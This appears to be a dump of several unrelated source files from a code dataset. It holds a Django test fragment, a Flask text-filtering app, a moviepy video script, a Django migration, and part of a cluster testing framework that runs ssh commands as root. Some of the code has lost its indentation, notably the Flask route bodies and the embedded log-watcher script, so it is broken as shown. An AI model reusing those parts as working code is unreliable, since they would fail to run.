                    self.group_ctype.pk, self.bluesmen.pk),
                'expected_valid': True,
                'expected_data': self.bluesmen,
            },
            {
                'form_class': FormMock,
                'fixture': 'x=%s-%s' % (
                    self.group_ctype.pk, self.emos.pk),
                'expected_valid': False,
            },
            {
                'form_class': FormMock,
                'fixture': 'x=12343-2',
                'expected_valid': False,
            },
            {
                'form_class': FormMock,
                'fixture': 'x=%s-2' % ContentType.objects.get_for_model(
                    City).pk,
                'expected_valid': False,
            },
        )
    def test_default_search_fields(self):
        # search_fields defaults to ('name',) per queryset when not set.
        class MyGeneric(autocomplete_light.AutocompleteGenericBase):
            choices = [Group.objects.all()]
        self.assertEqual(MyGeneric.search_fields, [('name',)])
|
12,438 | 799bc3c6e8e84d322887452077299de92c2442a3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from textteaser.parser import Parser
from flask import Flask
from flask import render_template
from flask import send_from_directory
from flask import request
DEBUG = True
THRESHOLD = 0.5
app = Flask(__name__)
text = ''
@app.route('/css/<path:path>')
def sendCss(path):
    # Serve static stylesheets from the local css/ directory.
    return send_from_directory('css', path)
@app.route("/whiteout", methods=['GET'])
def index():
return render_template('whiteout.html', text=text, cleaned=[])
@app.route("/whiteout", methods=['POST'])
def clean():
text = request.form['text']
w = Whiteout()
if DEBUG:
sentences = w.cleanWithScore(text)
else:
sentences = w.clean(text)
return render_template('whiteout.html', text=text, cleaned=sentences)
class Whiteout:
    """Filters text, keeping only sentences made mostly of dictionary words."""
    def __init__(self):
        self.parser = Parser()
        self.initDict()
    def initDict(self):
        """Build the known-word set from the bundled word lists."""
        self.words = set()
        self.addWordsFromList('data/20k.txt')
        self.addWordsFromList('data/wordnet.txt')
        self.addWordsFromList('data/mydict.txt')
    def addWordsFromList(self, path):
        """Add every stripped line of the file at *path* to the word set.

        (Parameter renamed from `list`, which shadowed the builtin; the
        method is only ever called positionally.)
        """
        with open(path) as file:
            for word in file:
                self.words.add(word.strip())
    def clean(self, text):
        """Return the sentences of *text* scoring at or above THRESHOLD."""
        sentences = self.parser.splitSentences(text)
        # (dead local `cleaned = []` from the original removed)
        return [sentence for sentence in sentences
                if self.sentenceScore(sentence) >= THRESHOLD]
    def cleanWithScore(self, text):
        """Like clean(), but precede each kept sentence with its score."""
        cleaned = []
        for sentence in self.parser.splitSentences(text):
            score = self.sentenceScore(sentence)
            if score >= THRESHOLD:
                cleaned.append("{:1.3f}".format(score))
                cleaned.append(sentence)
        return cleaned
    def sentenceScore(self, sentence):
        """Fraction of the sentence's words (length > 1) in the dictionary."""
        sentence = self.parser.removePunctations(sentence)
        words = self.parser.splitWords(sentence)
        if len(words) == 0:
            return 0.0  # avoid ZeroDivisionError on empty sentences
        count = 0.0
        for word in words:
            if word in self.words and len(word) > 1:
                count = count + 1
        return count / len(words)
12,439 | fac491b840dbd8560c8a764ffb01d15ce9a68e12 | #импортирую библиотеки
from moviepy import *
from moviepy.editor import *
from pygame import *
# Splice the video clips together
c11 = VideoFileClip("ZlatanI.mp4")
c11
c11 = c11.subclip(55,157)
c11 = c11.margin(20)
c12 = c11.fx(vfx.mirror_x)
c13 = c11
c14 = c11.fx(vfx.mirror_x)
# 2x2 grid: original and mirrored copy on each row.
Zlatan = clips_array([[c11,c12],[c13,c14]])
# NOTE(review): moviepy's resize() returns a new clip — this result (and
# the ones below) is discarded; assign it back if resizing is intended.
Zlatan.resize(width=360)
ZEBEST = ImageClip("TinaT.jpg")
ZEBEST.preview()
Justin = ImageSequenceClip(["BIB1.jpg","BIB2.jpg","BIB3.jpg","BIB4.jpg"], fps=5)
Justin.resize(width=360)
BieberGif = VideoFileClip("BIB5.gif")
# ImageMagick is not available on Windows, so the TextClip overlays are disabled
#TX = TextClip("THe NEW VIRAL YOUTUBE VIDEO!!!!",fontsize=70,color='black')
#TX = txt_clip.set_pos('center').set_duration(10)
#W=ImageClip("white", fps = 10)
#TXT = CompositeVideoClip([W,TX])
#TXT.resize(width=360)
#TXT2 = TextClip("Give me my Oscar!",fontsize=70,color='white')
#TXT2 = txt_clip.set_pos('center').set_duration(10)
Kim = VideoFileClip("KIM.mp4")
Kim.resize(width=360)
Kim = Kim.fx(vfx.blackwhite)
# NOTE(review): the concatenated result is never rendered to a file.
lapka44 = concatenate_videoclips([Justin, Zlatan, Kim, BieberGif])
# Edit the audio tracks
#Leps1 = AudioFileClip("Luis Fonsi.mp3").subclip(0,122)
#Leps2 = AudioFileClip("RussianPride.mp3").subclip(0,71)
#Leps3 = AudioFileClip("Luis Fonsi.mp3").subclip(0,13)
# Render (Final Cut Pro)
#Zlatan.preview(fps=25)
12,440 | 715f6398d4ab90effdf17dbc26cc3638026f6ab5 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2019-09-24 20:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates LianJia_table for scraped rental listings."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='LianJiaTenementHouse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('house_name', models.CharField(max_length=32, verbose_name='房源名称')),
                ('platform', models.CharField(default='链家网', max_length=6)),
                ('house_message', models.CharField(max_length=64, verbose_name='房源信息')),
                ('price', models.DecimalField(decimal_places=2, default='99999', max_digits=8, verbose_name='租金')),
                ('lon', models.DecimalField(decimal_places=6, default=0, max_digits=10, verbose_name='经度')),
                ('lat', models.DecimalField(decimal_places=6, default=0, max_digits=10, verbose_name='纬度')),
                ('url', models.CharField(max_length=148, verbose_name='具体链接')),
                ('images', models.CharField(max_length=64, verbose_name='图片')),
            ],
            options={
                'db_table': 'LianJia_table',
            },
        ),
    ]
|
12,441 | ebacb34c6caba2bdd4f41cecf77dd732a7e77a67 | '''CTS: Cluster Testing System: Main module
Classes related to testing high-availability clusters...
'''
__copyright__='''
Copyright (C) 2000, 2001 Alan Robertson <alanr@unix.sh>
Licensed under the GNU GPL.
'''
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import types, string, select, sys, time, re, os, struct, signal
import time, syslog, random, traceback, base64, pickle, binascii, fcntl
from socket import gethostbyname_ex
from UserDict import UserDict
from subprocess import Popen,PIPE
from cts.CTSvars import *
class CtsLab(UserDict):
    '''This class defines the Lab Environment for the Cluster Test System.
    It defines those things which are expected to change from test
    environment to test environment for the same cluster manager.
    It is where you define the set of nodes that are in your test lab
    what kind of reset mechanism you use, etc.
    This class is derived from a UserDict because we hold many
    different parameters of different kinds, and this provides
    provide a uniform and extensible interface useful for any kind of
    communication between the user/administrator/tester and CTS.
    At this point in time, it is the intent of this class to model static
    configuration and/or environmental data about the environment which
    doesn't change as the tests proceed.
    Well-known names (keys) are an important concept in this class.
    The HasMinimalKeys member function knows the minimal set of
    well-known names for the class.
    The following names are standard (well-known) at this time:
    nodes     An array of the nodes in the cluster
    reset     A ResetMechanism object
    logger    An array of objects that log strings...
    CMclass   The type of ClusterManager we are running
    (This is a class object, not a class instance)
    RandSeed  Random seed.  It is a triple of bytes. (optional)
    The CTS code ignores names it doesn't know about/need.
    The individual tests have access to this information, and it is
    perfectly acceptable to provide hints, tweaks, fine-tuning
    directions or other information to the tests through this mechanism.
    '''

    def __init__(self):
        # Backing store for the UserDict interface.
        self.data = {}
        self.rsh = RemoteExec(self)
        self.RandomGen = random.Random()
        self.Scenario = None

        # Defaults; individual labs override these via __setitem__.
        self["LogWatcher"] = "any"
        self["LogFileName"] = "/var/log/messages"
        self["OutputFile"] = None
        self["SyslogFacility"] = "daemon"
        self["CMclass"] = None
        self["logger"] = ([StdErrLog(self)])

        # Get a random seed for the random number generator.
        self.SeedRandom()

    def SeedRandom(self, seed=None):
        # Seed the RNG (default: current time).  Log differently when this
        # replaces a previous seed -- reseeding mid-run is noteworthy.
        if not seed:
            seed = int(time.time())

        if self.has_key("RandSeed"):
            self.log("New random seed is: " + str(seed))
        else:
            self.log("Random seed is: " + str(seed))

        self["RandSeed"] = seed
        self.RandomGen.seed(str(seed))

    def HasMinimalKeys(self):
        'Return TRUE if our object has the minimal set of keys/values in it'
        # NOTE(review): self.MinimalKeys is not defined in this chunk --
        # presumably provided elsewhere; confirm before relying on this.
        result = 1
        for key in self.MinimalKeys:
            if not self.has_key(key):
                result = None
        return result

    def log(self, args):
        "Log using each of the supplied logging methods"
        for logfcn in self._logfunctions:
            logfcn(string.strip(args))

    def debug(self, args):
        "Log using each of the supplied logging methods"
        # Debug-level output is deliberately suppressed on stderr sinks.
        for logfcn in self._logfunctions:
            if logfcn.name() != "StdErrLog":
                logfcn("debug: %s" % string.strip(args))

    def dump(self):
        # Dump the whole environment, sorted by key, at debug level.
        keys = []
        for key in self.keys():
            keys.append(key)
        keys.sort()
        for key in keys:
            self.debug("Environment["+key+"]:\t"+str(self[key]))

    def run(self, Scenario, Iterations):
        """Run Scenario for the requested number of Iterations.

        Returns 0 on full success, the failure count when failures were
        recorded, and 1 for setup errors or unexpected exceptions.
        """
        if not Scenario:
            self.log("No scenario was defined")
            return 1

        self.log("Cluster nodes: ")
        for node in self["nodes"]:
            self.log(" * %s" % (node))

        if not Scenario.SetUp():
            return 1

        try:
            Scenario.run(Iterations)
        except:
            # Log the traceback through every configured sink, then make
            # sure the scenario is still torn down before bailing out.
            self.log("Exception by %s" % sys.exc_info()[0])
            for logmethod in self["logger"]:
                traceback.print_exc(50, logmethod)
            Scenario.summarize()
            Scenario.TearDown()
            return 1

        #ClusterManager.oprofileSave(Iterations)
        Scenario.TearDown()
        Scenario.summarize()

        if Scenario.Stats["failure"] > 0:
            return Scenario.Stats["failure"]
        elif Scenario.Stats["success"] != Iterations:
            self.log("No failure count but success != requested iterations")
            return 1
        return 0

    def __setitem__(self, key, value):
        '''Since this function gets called whenever we modify the
        dictionary (object), we can (and do) validate those keys that we
        know how to validate.  For the most part, we know how to validate
        the "MinimalKeys" elements.
        '''
        #
        #        List of nodes in the system
        #
        if key == "nodes":
            self.Nodes = {}
            for node in value:
                # I don't think I need the IP address, etc. but this validates
                # the node name against /etc/hosts and/or DNS, so it's a
                # GoodThing(tm).
                try:
                    self.Nodes[node] = gethostbyname_ex(node)
                except:
                    print node+" not found in DNS... aborting"
                    raise
        #
        #        List of Logging Mechanism(s)
        #
        elif key == "logger":
            if len(value) < 1:
                raise ValueError("Must have at least one logging mechanism")
            for logger in value:
                if not callable(logger):
                    raise ValueError("'logger' elements must be callable")
            self._logfunctions = value
        #
        #        Cluster Manager Class
        #
        elif key == "CMclass":
            if value and not issubclass(value, ClusterManager):
                raise ValueError("'CMclass' must be a subclass of"
                                 " ClusterManager")
        #
        #        Initial Random seed...
        #
        #elif key == "RandSeed":
        #    if len(value) != 3:
        #        raise ValueError("'Randseed' must be a 3-element list/tuple")
        #    for elem in value:
        #        if not isinstance(elem, types.IntType):
        #            raise ValueError("'Randseed' list must all be ints")

        self.data[key] = value

    def IsValidNode(self, node):
        'Return TRUE if the given node is valid'
        return self.Nodes.has_key(node)

    def __CheckNode(self, node):
        "Raise a ValueError if the given node isn't valid"
        if not self.IsValidNode(node):
            raise ValueError("Invalid node [%s] in CheckNode" % node)

    def RandomNode(self):
        '''Choose a random node from the cluster'''
        return self.RandomGen.choice(self["nodes"])
class Logger:
    """Abstract base class for CTS log sinks.

    Subclasses implement __call__; the file-protocol shims below
    (write/writelines/flush/isatty) let a sink be handed to code that
    expects a stream, e.g. traceback.print_exc.
    """

    # strftime format concrete sinks use when timestamping lines.
    TimeFormat = "%b %d %H:%M:%S\t"

    def __call__(self, lines):
        # Concrete sinks must override this.
        raise ValueError("Abstract class member (__call__)")

    def write(self, line):
        # Stream shim: drop the trailing newline and log the line.
        return self(line.rstrip())

    def writelines(self, lines):
        # Stream shim: log each supplied line in turn.
        for one_line in lines:
            self.write(one_line)
        return 1

    def flush(self):
        # Nothing is buffered here; report success.
        return 1

    def isatty(self):
        # A log sink is never an interactive terminal.
        return None
class SysLog(Logger):
    """Log sink that forwards lines to syslog(3).

    The ident string comes from labinfo["syslogsource"] (default "CTS");
    the facility from labinfo["SyslogFacility"].
    """
    # http://docs.python.org/lib/module-syslog.html
    defaultsource = "CTS"

    # Symbolic facility name -> syslog module constant.
    # NOTE(review): class attribute shadows the builtin 'map'.
    map = {
        "kernel":   syslog.LOG_KERN,
        "user":     syslog.LOG_USER,
        "mail":     syslog.LOG_MAIL,
        "daemon":   syslog.LOG_DAEMON,
        "auth":     syslog.LOG_AUTH,
        "lpr":      syslog.LOG_LPR,
        "news":     syslog.LOG_NEWS,
        "uucp":     syslog.LOG_UUCP,
        "cron":     syslog.LOG_CRON,
        "local0":   syslog.LOG_LOCAL0,
        "local1":   syslog.LOG_LOCAL1,
        "local2":   syslog.LOG_LOCAL2,
        "local3":   syslog.LOG_LOCAL3,
        "local4":   syslog.LOG_LOCAL4,
        "local5":   syslog.LOG_LOCAL5,
        "local6":   syslog.LOG_LOCAL6,
        "local7":   syslog.LOG_LOCAL7,
    }

    def __init__(self, labinfo):
        if labinfo.has_key("syslogsource"):
            self.source = labinfo["syslogsource"]
        else:
            self.source = SysLog.defaultsource

        self.facility = "daemon"
        if labinfo.has_key("SyslogFacility") and labinfo["SyslogFacility"]:
            if SysLog.map.has_key(labinfo["SyslogFacility"]):
                self.facility = labinfo["SyslogFacility"]
            else:
                raise ValueError("%s: bad syslog facility"%labinfo["SyslogFacility"])

        # Translate the symbolic name into the numeric facility and open
        # the connection once for the life of the sink.
        self.facility = SysLog.map[self.facility]
        syslog.openlog(self.source, 0, self.facility)

    def setfacility(self, facility):
        # Change facility at runtime: close and reopen the syslog handle.
        self.facility = facility
        if SysLog.map.has_key(self.facility):
            self.facility = SysLog.map[self.facility]
        syslog.closelog()
        syslog.openlog(self.source, 0, self.facility)

    def __call__(self, lines):
        # Accept either a single string or a sequence of lines.
        if isinstance(lines, types.StringType):
            syslog.syslog(lines)
        else:
            for line in lines:
                syslog.syslog(line)

    def name(self):
        # Identify this sink type (used when filtering debug output).
        return "Syslog"
class StdErrLog(Logger):
    """Log sink that writes timestamped lines to the real stderr.

    Writes through sys.__stderr__ so output still appears even when
    sys.stderr has been redirected.
    """

    def __init__(self, labinfo):
        # No per-lab configuration is needed for stderr output.
        pass

    def __call__(self, lines):
        # Accept a single string or a sequence; timestamp every line.
        t = time.strftime(Logger.TimeFormat, time.localtime(time.time()))
        if isinstance(lines, types.StringType):
            sys.__stderr__.writelines([t, lines, "\n"])
        else:
            for line in lines:
                sys.__stderr__.writelines([t, line, "\n"])
        sys.__stderr__.flush()

    def name(self):
        # Identify this sink type; CtsLab.debug() skips StdErrLog sinks.
        return "StdErrLog"
class FileLog(Logger):
    """Log sink that appends timestamped lines to a file.

    Every line is prefixed "<time> <hostname> CTS: " so that logs collected
    from several machines can be merged and attributed.
    """

    def __init__(self, labinfo, filename=None):
        # Default to the lab-wide log file unless a filename is given.
        if filename == None:
            filename = labinfo["LogFileName"]
        self.logfile = filename
        # 'os' is imported at module level; the redundant local
        # 'import os' that used to live here has been removed.
        self.hostname = os.uname()[1]+" "
        self.source = "CTS: "

    def __call__(self, lines):
        """Append a single line or a sequence of lines to the log file."""
        fd = open(self.logfile, "a")
        try:
            t = time.strftime(Logger.TimeFormat, time.localtime(time.time()))
            if isinstance(lines, types.StringType):
                fd.writelines([t, self.hostname, self.source, lines, "\n"])
            else:
                for line in lines:
                    fd.writelines([t, self.hostname, self.source, line, "\n"])
        finally:
            # Always release the handle, even if a write fails.
            fd.close()

    def name(self):
        # Identify this sink type (used when filtering debug output).
        return "FileLog"
class RemoteExec:
    '''This is an abstract remote execution class.  It runs a command on another
    machine - somehow.  The somehow is up to us.  This particular
    class uses ssh.
    Most of the work is done by fork/exec of ssh or scp.
    '''

    def __init__(self, Env=None, silent=False):
        self.Env = Env
        self.silent = silent

        #   -n: no stdin, -x: no X11,
        #   -o ServerAliveInterval=5 disconnect after 3*5s if the server stops responding
        self.Command = "ssh -l root -n -x -o ServerAliveInterval=5 -o ConnectTimeout=10 -o TCPKeepAlive=yes -o ServerAliveCountMax=3 "
        #        -B: batch mode, -q: no stats (quiet)
        self.CpCommand = "scp -B -q"

        # Our own hostname, lowercased, so _cmd can spot local targets.
        self.OurNode = string.lower(os.uname()[1])

    def enable_qarsh(self):
        # Switch to QARSH instead of ssh/scp for all remote operations.
        # http://nstraz.wordpress.com/2008/12/03/introducing-qarsh/
        self.log("Using QARSH for connections to cluster nodes")
        self.Command = "qarsh -t 300 -l root"
        self.CpCommand = "qacp -q"

    def _fixcmd(self, cmd):
        # Escape embedded single quotes so cmd survives the outer '...'
        # wrapping added by _cmd.
        return re.sub("\'", "'\\''", cmd)

    def _cmd(self, *args):
        '''Compute the string that will run the given command on the
        given remote system'''
        args = args[0]
        sysname = args[0]
        command = args[1]

        #print "sysname: %s, us: %s" % (sysname, self.OurNode)
        if sysname == None or string.lower(sysname) == self.OurNode or sysname == "localhost":
            # Local target: run the command directly, no ssh overhead.
            ret = command
        else:
            ret = self.Command + " " + sysname + " '" + self._fixcmd(command) + "'"
        #print ("About to run %s\n" % ret)
        return ret

    def log(self, args):
        # Route through the environment's logger when we have one.
        if not self.silent:
            if not self.Env:
                print (args)
            else:
                self.Env.log(args)

    def debug(self, args):
        # Route through the environment's debug logger when we have one.
        if not self.silent:
            if not self.Env:
                print (args)
            else:
                self.Env.debug(args)

    def __call__(self, node, command, stdout=0, synchronous=1, silent=False, blocking=True):
        '''Run the given command on the given remote system
        If you call this class like a function, this is the function that gets
        called.  It just runs it roughly as though it were a system() call
        on the remote machine.  The first argument is name of the machine to
        run it on.

        Return value depends on the arguments:
          synchronous=0 -> 0 if the child was spawned, -1 otherwise
          stdout=1      -> first line of the command's stdout
          stdout=0      -> the command's exit status
          otherwise     -> (exit status, list of stdout lines)
        '''
        rc = 0
        result = None
        if not synchronous:
            # Fire and forget; we never wait for or reap this child here.
            proc = Popen(self._cmd([node, command]),
                         stdout = PIPE, stderr = PIPE, close_fds = True, shell = True)
            if not silent: self.debug("cmd: async: target=%s, rc=%d: %s" % (node, proc.pid, command))
            if proc.pid > 0:
                return 0
            return -1

        proc = Popen(self._cmd([node, command]),
                     stdout = PIPE, stderr = PIPE, close_fds = True, shell = True)

        #if not blocking:
        #    fcntl.fcntl(proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)

        if proc.stdout:
            if stdout == 1:
                result = proc.stdout.readline()
            else:
                result = proc.stdout.readlines()
            proc.stdout.close()
        else:
            self.log("No stdout stream")

        rc = proc.wait()

        if not silent: self.debug("cmd: target=%s, rc=%d: %s" % (node, rc, command))

        if stdout == 1:
            return result

        if proc.stderr:
            errors = proc.stderr.readlines()
            proc.stderr.close()
            if not silent:
                for err in errors:
                    self.debug("cmd: stderr: %s" % err)

        if stdout == 0:
            if not silent and result:
                for line in result:
                    self.debug("cmd: stdout: %s" % line)
            return rc

        return (rc, result)

    def cp(self, source, target, silent=False):
        '''Perform a remote copy'''
        # Quote both ends; scp/qacp interpret host:path themselves.
        cpstring = self.CpCommand + " \'" + source + "\'" + " \'" + target + "\'"
        rc = os.system(cpstring)
        if not silent: self.debug("cmd: rc=%d: %s" % (rc, cpstring))
        return rc
has_log_watcher = {}
log_watcher_bin = "/tmp/cts_log_watcher.py"
log_watcher = """
import sys, os, fcntl
'''
Remote logfile reader for CTS
Reads a specified number of lines from the supplied offset
Returns the current offset
Contains logic for handling truncation
'''
limit = 0
offset = 0
prefix = ''
filename = '/var/log/messages'
skipthis=None
args=sys.argv[1:]
for i in range(0, len(args)):
if skipthis:
skipthis=None
continue
elif args[i] == '-l' or args[i] == '--limit':
skipthis=1
limit = int(args[i+1])
elif args[i] == '-f' or args[i] == '--filename':
skipthis=1
filename = args[i+1]
elif args[i] == '-o' or args[i] == '--offset':
skipthis=1
offset = args[i+1]
elif args[i] == '-p' or args[i] == '--prefix':
skipthis=1
prefix = args[i+1]
logfile=open(filename, 'r')
logfile.seek(0, os.SEEK_END)
newsize=logfile.tell()
if offset != 'EOF':
offset = int(offset)
if newsize >= offset:
logfile.seek(offset)
else:
print prefix + ('File truncated from %d to %d' % (offset, newsize))
if (newsize*1.05) < offset:
logfile.seek(0)
# else: we probably just lost a few logs after a fencing op
# continue from the new end
# TODO: accept a timestamp and discard all messages older than it
# Don't block when we reach EOF
fcntl.fcntl(logfile.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
count = 0
while True:
if logfile.tell() >= newsize: break
elif limit and count >= limit: break
line = logfile.readline()
if not line: break
print line.strip()
count += 1
print prefix + 'Last read: %d, limit=%d, count=%d' % (logfile.tell(), limit, count)
logfile.close()
"""
class SearchObj:
    """Tails one (possibly remote) log file via the installed helper script.

    Keeps a byte offset into the file and hands back newly appended lines
    on each next() call.
    """

    def __init__(self, Env, filename, host=None):
        self.Env = Env
        self.host = host
        self.filename = filename

        self.cache = []
        # "EOF" tells the helper to start from the current end of file.
        self.offset = "EOF"

        if host == None:
            # Only the local variable changes: self.host stays None for
            # local files (that distinction is used by __str__).
            host = "localhost"

        global has_log_watcher
        if not has_log_watcher.has_key(host):

            global log_watcher
            global log_watcher_bin

            self.debug("Installing %s on %s" % (log_watcher_bin, host))
            self.Env.rsh(host, '''echo "%s" > %s''' % (log_watcher, log_watcher_bin), silent=True)
            has_log_watcher[host] = 1

        # Prime the offset so subsequent calls return only new lines.
        self.next()

    def __str__(self):
        if self.host:
            return "%s:%s" % (self.host, self.filename)
        return self.filename

    def log(self, args):
        message = "lw: %s: %s" % (self, args)
        if not self.Env:
            print (message)
        else:
            self.Env.log(message)

    def debug(self, args):
        message = "lw: %s: %s" % (self, args)
        if not self.Env:
            print (message)
        else:
            self.Env.debug(message)

    def next(self):
        """Return the lines appended to the file since the last call.

        Runs the remote helper, consumes its CTSwatcher: control lines to
        advance self.offset, and returns the payload lines.
        """
        cache = []
        if not len(self.cache):
            global log_watcher_bin
            (rc, lines) = self.Env.rsh(
                self.host,
                "python %s -p CTSwatcher: -f %s -o %s" % (log_watcher_bin, self.filename, self.offset),
                stdout=None, silent=True, blocking=False)

            for line in lines:
                match = re.search("^CTSwatcher:Last read: (\d+)", line)
                if match:
                    last_offset = self.offset
                    self.offset = match.group(1)
                    #if last_offset == "EOF": self.debug("Got %d lines, new offset: %s" % (len(lines), self.offset))
                elif re.search("^CTSwatcher:.*truncated", line):
                    self.log(line)
                elif re.search("^CTSwatcher:", line):
                    self.debug("Got control line: "+ line)
                else:
                    cache.append(line)

        return cache
class LogWatcher(RemoteExec):
    '''This class watches logs for messages that fit certain regular
    expressions.  Watching logs for events isn't the ideal way
    to do business, but it's better than nothing :-)
    On the other hand, this class is really pretty cool ;-)
    The way you use this class is as follows:
    Construct a LogWatcher object
    Call setwatch() when you want to start watching the log
    Call look() to scan the log looking for the patterns
    '''

    def __init__(self, Env, log, regexes, name="Anon", timeout=10, debug_level=None, silent=False):
        '''This is the constructor for the LogWatcher class.  It takes a
        log name to watch, and a list of regular expressions to watch for.
        '''
        RemoteExec.__init__(self, Env)

        #  Validate our arguments.  Better sooner than later ;-)
        for regex in regexes:
            assert re.compile(regex)

        self.name = name
        self.regexes = regexes
        self.filename = log
        self.debug_level = debug_level
        self.whichmatch = -1
        self.unmatched = None

        self.file_list = []
        self.line_cache = []

        if not silent:
            for regex in self.regexes:
                self.debug("Looking for regex: "+regex)

        self.Timeout = int(timeout)
        self.returnonlymatch = None

    def debug(self, args):
        # Prefix our watcher name so interleaved watcher output is readable.
        message = "lw: %s: %s" % (self.name, args)
        if not self.Env:
            print (message)
        else:
            self.Env.debug(message)

    def setwatch(self):
        '''Mark the place to start watching the log from.
        '''
        if self.Env["LogWatcher"] == "remote":
            # One SearchObj per node: each node's own copy of the log.
            for node in self.Env["nodes"]:
                self.file_list.append(SearchObj(self.Env, self.filename, node))
        else:
            self.file_list.append(SearchObj(self.Env, self.filename))

    def __del__(self):
        if self.debug_level > 1: self.debug("Destroy")

    def ReturnOnlyMatch(self, onlymatch=1):
        '''Specify one or more subgroups of the match to return rather than the whole string
        http://www.python.org/doc/2.5.2/lib/match-objects.html
        '''
        self.returnonlymatch = onlymatch

    def __get_lines(self):
        # Pull any new lines from every source into the shared cache.
        if not len(self.file_list):
            raise ValueError("No sources to read from")

        for f in self.file_list:
            lines = f.next()
            if len(lines):
                self.line_cache.extend(lines)

    def look(self, timeout=None, silent=False):
        '''Examine the log looking for the given patterns.
        It starts looking from the place marked by setwatch().
        This function looks in the file in the fashion of tail -f.
        It properly recovers from log file truncation, but not from
        removing and recreating the log.  It would be nice if it
        recovered from this as well :-)
        We return the first line which matches any of our patterns.
        '''
        if timeout == None: timeout = self.Timeout

        lines = 0
        begin = time.time()
        end = begin + timeout + 1
        if self.debug_level > 2: self.debug("starting single search: timeout=%d, begin=%d, end=%d" % (timeout, begin, end))

        self.__get_lines()
        while True:
            if len(self.line_cache):
                lines += 1
                line = self.line_cache[0]
                self.line_cache.remove(line)

                which = -1
                if re.search("CTS:", line):
                    # Skip our own chatter so we never match ourselves.
                    continue
                if self.debug_level > 2: self.debug("Processing: "+ line)
                for regex in self.regexes:
                    which = which+1
                    if self.debug_level > 2: self.debug("Comparing line to: "+ regex)
                    #matchobj = re.search(string.lower(regex), string.lower(line))
                    matchobj = re.search(regex, line)
                    if matchobj:
                        self.whichmatch = which
                        if self.returnonlymatch:
                            return matchobj.group(self.returnonlymatch)
                        else:
                            self.debug("Matched: "+line)
                            if self.debug_level > 1: self.debug("With: "+ regex)
                            return line

            elif timeout > 0 and end > time.time():
                time.sleep(1)
                self.__get_lines()

            elif timeout > 0:
                # Grab any relevant messages that might have arrived since
                # the last time the buffer was populated
                self.__get_lines()

                # Don't come back here again
                timeout = 0

            else:
                self.debug("Single search terminated: start=%d, end=%d, now=%d, lines=%d" % (begin, end, time.time(), lines))
                return None

        self.debug("How did we get here")
        return None

    def lookforall(self, timeout=None, allow_multiple_matches=None, silent=False):
        '''Examine the log looking for ALL of the given patterns.
        It starts looking from the place marked by setwatch().
        We return when the timeout is reached, or when we have found
        ALL of the regexes that were part of the watch
        '''
        if timeout == None: timeout = self.Timeout
        save_regexes = self.regexes
        # Work on a private copy: the matching loop below deletes entries,
        # and previously 'save_regexes' aliased the live list, so the
        # "restore" at the end was a no-op and the caller-supplied regex
        # list was corrupted -- the watcher could never be reused.
        self.regexes = self.regexes[:]
        returnresult = []

        if not silent:
            self.debug("starting search: timeout=%d" % timeout)
            for regex in self.regexes:
                if self.debug_level > 2: self.debug("Looking for regex: "+regex)

        while (len(self.regexes) > 0):
            oneresult = self.look(timeout)
            if not oneresult:
                self.unmatched = self.regexes
                self.matched = returnresult
                self.regexes = save_regexes
                return None

            returnresult.append(oneresult)
            if not allow_multiple_matches:
                del self.regexes[self.whichmatch]

            else:
                # Allow multiple regexes to match a single line
                tmp_regexes = self.regexes
                self.regexes = []
                for regex in tmp_regexes:
                    matchobj = re.search(regex, oneresult)
                    if not matchobj:
                        self.regexes.append(regex)

        self.unmatched = None
        self.matched = returnresult
        self.regexes = save_regexes
        return returnresult
class NodeStatus:
    """Answers "is this node up?" questions via ping and ssh probes."""

    def __init__(self, Env):
        self.Env = Env

    def IsNodeBooted(self, node):
        '''Return TRUE if the given node is booted (responds to pings)'''
        return self.Env.rsh("localhost", "ping -nq -c1 -w1 %s" % node, silent=True) == 0

    def IsSshdUp(self, node):
        # A trivial remote command succeeds only when sshd is answering.
        rc = self.Env.rsh(node, "true", silent=True)
        return rc == 0

    def WaitForNodeToComeUp(self, node, Timeout=300):
        '''Return TRUE when given node comes up, or None/FALSE if timeout'''
        timeout = Timeout
        anytimeouts = 0
        while timeout > 0:
            if self.IsNodeBooted(node) and self.IsSshdUp(node):
                if anytimeouts:
                    # Fudge to wait for the system to finish coming up
                    time.sleep(30)
                self.Env.debug("Node %s now up" % node)
                return 1

            time.sleep(30)
            if (not anytimeouts):
                self.Env.debug("Waiting for node %s to come up" % node)

            anytimeouts = 1
            timeout = timeout - 1

        self.Env.log("%s did not come up within %d tries" % (node, Timeout))
        # Interactive escape hatch: a human can choose to continue anyway.
        # (raw_input is Python 2.)
        answer = raw_input('Continue? [nY]')
        if answer and answer == "n":
            raise ValueError("%s did not come up within %d tries" % (node, Timeout))

    def WaitForAllNodesToComeUp(self, nodes, timeout=300):
        '''Return TRUE when all nodes come up, or FALSE if timeout'''
        for node in nodes:
            if not self.WaitForNodeToComeUp(node, timeout):
                return None
        return 1
class ClusterManager(UserDict):
'''The Cluster Manager class.
This is an subclass of the Python dictionary class.
(this is because it contains lots of {name,value} pairs,
not because it's behavior is that terribly similar to a
dictionary in other ways.)
This is an abstract class which class implements high-level
operations on the cluster and/or its cluster managers.
Actual cluster managers classes are subclassed from this type.
One of the things we do is track the state we think every node should
be in.
'''
    def __InitialConditions(self):
        # Hook for pre-flight sanity checks, run once from __init__.
        # The euid-root check is intentionally disabled.
        #if os.geteuid() != 0:
        #  raise ValueError("Must Be Root!")
        None
    def _finalConditions(self):
        # Verify the subclass filled in every required template value;
        # any key left at None means an incomplete derivation.
        for key in self.keys():
            if self[key] == None:
                raise ValueError("Improper derivation: self[" + key
                                 + "] must be overridden by subclass.")
    def __init__(self, Environment, randseed=None):
        # Environment: the CtsLab this manager operates in.
        # randseed is accepted for interface compatibility but unused here.
